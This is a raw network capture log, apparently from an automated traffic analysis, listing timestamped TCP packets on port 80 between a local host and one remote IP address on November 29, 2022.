                                                                          Nov 29, 2022 09:20:40.370454073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.370517969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.370572090 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.370625973 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.370629072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.370630026 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.370678902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.370733976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.370788097 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.370806932 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.370842934 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.370915890 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.370973110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.370974064 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.370974064 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.371026993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.371079922 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.371149063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.371150017 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.371150017 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.371150017 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.371150017 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.371170998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.371244907 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.371258020 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.371299982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.371352911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.371407032 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.371459007 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.371473074 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.371473074 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.371511936 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.371582031 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.371598005 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.371598959 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.371598959 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.371598959 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.371638060 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.371706009 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.371763945 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.371767044 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.371767044 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.371819019 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.371865034 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.371928930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.371937037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.371937037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.371999979 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.372061968 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.372109890 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.372117996 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.372159958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.372329950 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.372329950 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.372330904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.372395039 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.373780012 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.373872995 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.373930931 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.373985052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374027967 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374038935 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374087095 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374087095 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374093056 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374146938 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374202013 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374255896 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374309063 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374310970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374311924 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374311924 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374363899 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374417067 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374473095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374486923 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374486923 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374486923 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374488115 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374526978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374581099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374634981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374656916 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374687910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374732018 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.374824047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374824047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374824047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374824047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374824047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.374996901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.378233910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378310919 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378370047 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378424883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378479004 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378531933 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378587008 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378642082 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378647089 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.378699064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378753901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378807068 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378818989 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.378861904 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378915071 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378976107 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.378988981 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.378988981 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.378988981 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.378989935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.378989935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379031897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379086971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379142046 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379156113 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379157066 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379157066 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379195929 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379249096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379301071 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379323959 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379324913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379324913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379354954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379409075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379445076 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379462004 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379515886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379569054 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379615068 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379617929 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379617929 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379617929 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379618883 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379618883 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379618883 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379668951 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379722118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379777908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379784107 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379784107 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.379859924 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379919052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.379973888 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380008936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380008936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380008936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380028009 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380084038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380137920 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380177975 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380192041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380233049 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380233049 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380234003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380247116 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380301952 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380383968 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380439043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380449057 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380492926 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380548000 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380604029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380620003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380620003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380682945 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380742073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380795002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380795002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380814075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380882025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380929947 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.380960941 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380960941 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380960941 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.380961895 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.381206989 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.381206989 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.386230946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386323929 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386384964 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386440039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386478901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.386497974 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386554003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386624098 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.386631966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386696100 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386749029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386802912 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386806965 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.386806965 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.386806965 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.386806965 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.386806965 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.386857033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386912107 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.386936903 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.386965990 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387021065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387073040 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387125969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387136936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387137890 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387178898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387247086 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387260914 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387260914 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387260914 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387307882 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387362003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387415886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387428999 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387485981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387553930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387603045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387603045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387603045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387603045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387609005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387603045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387662888 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387710094 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387762070 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387769938 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387770891 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387814999 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387867928 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387921095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.387948036 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.387974024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388027906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388079882 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388133049 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388160944 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388160944 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388160944 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388160944 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388160944 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388200998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388271093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388282061 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388282061 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388282061 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388282061 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388360977 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388379097 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388416052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388484955 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388552904 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388601065 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388607025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388601065 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388660908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388715029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388768911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388772964 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388772964 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388772964 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388822079 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388875008 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388927937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.388942957 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.388982058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.389036894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.389090061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.389107943 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.389108896 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.389108896 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.389108896 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.389146090 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.389208078 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.389262915 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.389292955 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.389293909 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.389317036 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.389370918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.389400005 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.389400005 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.389435053 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.389504910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.389559984 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.389570951 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.389570951 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.389570951 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.389570951 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.389609098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.389739037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.389739037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.389739990 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.389833927 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.390116930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.390266895 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.390311003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.390325069 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.390379906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.390456915 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.390516043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.390568972 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.390583992 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.390584946 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.390584946 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.390624046 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.390676975 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.390731096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.390752077 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.390752077 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.390784025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.390837908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.390889883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.390945911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.390944004 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.390944004 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.390944004 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.390944958 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.391036034 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.391074896 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.391076088 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.391092062 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.391146898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.391201019 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.391248941 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.391248941 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.391254902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.391248941 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.391248941 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.391320944 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.391390085 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.391412020 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.391412020 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.391446114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.391500950 CET8049852104.21.44.194192.168.11.20
